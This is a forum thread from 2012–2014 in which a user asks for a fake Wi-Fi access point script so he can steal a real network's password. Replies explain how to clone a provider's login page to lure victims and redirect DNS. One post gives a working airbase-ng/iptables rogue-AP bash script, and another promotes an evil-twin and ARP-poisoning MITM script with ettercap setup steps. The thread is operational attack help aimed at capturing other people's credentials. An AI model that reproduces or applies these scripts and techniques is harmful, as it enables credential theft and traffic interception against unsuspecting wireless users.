How to Create a Fake Access Point or Are There Any Scripts?

Discussion in 'Scripts & Commands' started by HoT_Pursuit, 25 Jul 2012.

  1. HoT_Pursuit

    HoT_Pursuit Well-Known Member
    Dev Team VIP

    Joined:
    20 Jul 2012
    Messages:
    77
    Likes Received:
    55
    Trophy Points:
    190
    Hello guys

    I need script to made a fake AP using Backtrack 5 & RTL8187.

    I found "FakeAP_pwn" script by "g0t milk" , but this script doesn't work with BT5 & it use to hack by metaSploit only.

    i want script to make fake AP to stealing real AP password.
     
  2. Chaos

    Chaos Well-Known Member

    Joined:
    25 May 2012
    Messages:
    11
    Likes Received:
    7
    Trophy Points:
    65
    • Like Like x 2
  3. Pascal

    Pascal Wifi Sniffer
    Staff Member Moderator VIP

    Joined:
    6 Jun 2012
    Messages:
    211
    Likes Received:
    89
    Trophy Points:
    256
    Use Gerix on Backtrack ;)
     
    • Like Like x 1
  4. Chaos

    Chaos Well-Known Member

    Joined:
    25 May 2012
    Messages:
    11
    Likes Received:
    7
    Trophy Points:
    65
    The drawback to that technique is that well ... you can't know whether he'll connect to that "new" AP (if he has auto-connect) and he also has to enter the wpa on that fake login site of yours (which has to be the same as his provider)

    I've read some stuff about wifi pineapple, but not sure if it uses this same technique (I doubt it).
    I think it somehow sees that remembered password, which is something I'd wanna do (because that login page relies only on chance [ignorance of people])
     
    • Like Like x 1
  5. Pascal

    Pascal Wifi Sniffer
    Staff Member Moderator VIP

    Joined:
    6 Jun 2012
    Messages:
    211
    Likes Received:
    89
    Trophy Points:
    256

    After creating server, you have made ​​a copy of the authentication page of the Internet access provider of the victim.

    Must be the same page and well done graphically in order to lure legitimate victim.

    Do not forget to redirect DNS to your desired server and leave the rest open to show the victim that he has access to the internet to navigate properly;)


    If the goal is to hack for a connection that is one thing but if it is to recover usernames and passwords or other bank, I will not answer to this kind of thread ...


    Remember that we do not like to undergo what is done in other;)
     
    • Like Like x 2
  6. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member Admin Moderator VIP

    Joined:
    18 May 2012
    Messages:
    3,087
    Likes Received:
    1,187
    Trophy Points:
    351
    Ah, so you want to make a form of honeypot. There are many devices out there you can purchase specifically for this reason.
    http://hakshop.myshopify.com/products/wifi-pineapple

    Code:
    Select All
    #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan1 # Change to your wlan interface sleep 5; airmon-ng start wlan1 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo "1" > /proc/sys/net/ipv4/ip_forward
    Source & Credit: Exploit KB
     
    • Like Like x 1
  7. HoT_Pursuit

    HoT_Pursuit Well-Known Member
    Dev Team VIP

    Joined:
    20 Jul 2012
    Messages:
    77
    Likes Received:
    55
    Trophy Points:
    190
    well

    thank 's every body :)

    I am still beginner , & i want to learn everything in Linux OS.
     
  8. faizuldin

    faizuldin Well-Known Member

    Joined:
    14 Jul 2012
    Messages:
    33
    Likes Received:
    1
    Trophy Points:
    80
    just want ask you something,for what reason you want create a fake AP?
     
  9. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member Admin Moderator VIP

    Joined:
    18 May 2012
    Messages:
    3,087
    Likes Received:
    1,187
    Trophy Points:
    351
    Probably for a honeypot. Extracting information, passwords and alike :D
     
  10. comfast98

    comfast98 Well-Known Member

    Joined:
    24 Jul 2012
    Messages:
    9
    Likes Received:
    5
    Trophy Points:
    65
    Backtrack 5 r3 Fake-AP MITM script! 100% working v1.0

    HEY everyone,

    MAKE SURE YOUR SCRIPT IS VERSION 1.0. It will say on the main menu what version you have.

    HERE IS THE DOWNLOAD LINK!!!!
    https://www.onlinefilefolder.com/4sJoCIrYCK6KEl

    HERE IS A LINK TO THE ORIGINAL THREAD.
    http://top-hat-sec.com/forum/index.php?topic=1667.0

    HERE IS A LINK TO MY WEBSITE SHOWING THE SCRIPT IN ACTION
    http://em3rgency.com/em3rgencys-100-...p-mitm-script/

    AFTER about a few weeks of learning and non stop coding, The script is finally complete!!!! Be easy on my, This is my first script I have ever written.

    The script is 100% working on bt5r3 test machine, You just install the prerequistes and chmod 775 911_AP.sh. You can run the script from any directory on your PC. You can even place it inside /usr/bin and just type 911_AP in terminal and it will be part of your system!!

    It should be fully functional. The script has everything you need on a fresh install of BT5r3 to make it compatible and ready to run.

    1 . Prerequsites and Updates
    2. Run FAKE AP Static
    3. Run EVIL TWIN AP
    4. Run Standard ARP poison
    5. Netdiscover connected clients
    6. EXIT

    !!!!!ALSO CHANGE /etc/default/dhcp3-server!!!!!!!
    put "at0" and save

    It will not work with ISC_DHCP_SERVER. You will need to do the following.

    THIS IS FOR any other OS besides BT5
    apt-get purge dhcp3-server
    apt-get purge dhcp3-common

    You will need to use this version of DHCP3 server
    http://www.mediafire.com/?oxgkgdio8ndjq5l
    http://www.mediafire.com/?p3g4maize6p60dy

    tar xzvf <FILENAME>
    tar xzvf <FILENAME>

    Enjoy!!! you can seriously pwn anyone on a network with this script. IT is fast!!! and reliable, I have had my FAKE_AP running for days without a crash!!!


    THANKS,

    TO GET THE ARP POISONING TO WORK CORRECTLY YOU HAVE TO

    make sure you commented out your etter.conf file so you dont have the # sign in front of the lines that say

    Open terminal and type

    gedit /etc/etter.conf --------> When done editing these lines save the file

    #If you are using IP tables, Like below

    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    to this "Just remove the # signs from the front of each line"

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    And also edit these lines to look like this

    [privs]
    ec_uid = 65534 # nobody is the default
    ec_gid = 65534 # nobody is the default

    Change the 65534 to 0's in each of the 2 lines..

    [privs]
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

    !!!!!ALSO CHANGE /etc/default/dhcp3-server!!!!!!!
    put "at0" and save

    AND ENJOY YOUR WIRELESS PWNING!!!
    [​IMG] Immagini allegate
     
    • Like Like x 1
  11. Pascal

    Pascal Wifi Sniffer
    Staff Member Moderator VIP

    Joined:
    6 Jun 2012
    Messages:
    211
    Likes Received:
    89
    Trophy Points:
    256
    Hello ;)


    For the first link for download :
    This file has been shared through Online Storage
    We could not retrieve this file because the link is invalid.


    Copyright © 2005-2013. All rights reserved.

    Have you a new link ?
     
  12. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    144
    Trophy Points:
    161
    #12 meknb, 7 Sep 2013
    Last edited: 2 Aug 2014
  13. ghostkids

    ghostkids Well-Known Member

    Joined:
    24 Jan 2013
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    83
    This file has been shared through Online Storage
    We could not retrieve this file because the link is invalid.

    Copyright © 2005-2014. All rights reserved.
     
  14. rdcdt

    rdcdt Active Member

    Joined:
    30 Jun 2014
    Messages:
    30
    Likes Received:
    2
    Trophy Points:
    40
    all link is dead
     
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K